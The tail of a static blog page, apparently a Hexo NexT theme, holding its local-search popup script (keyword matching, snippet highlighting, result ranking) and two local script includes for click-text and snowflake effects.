      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <!--单击显示文字-->
<script type="text/javascript" src="/js/src/hxjzg.js"></script>

<!-- 雪花特效 -->
<script type="text/javascript" src="/js/src/snow.js"></script>

</body>
</html>
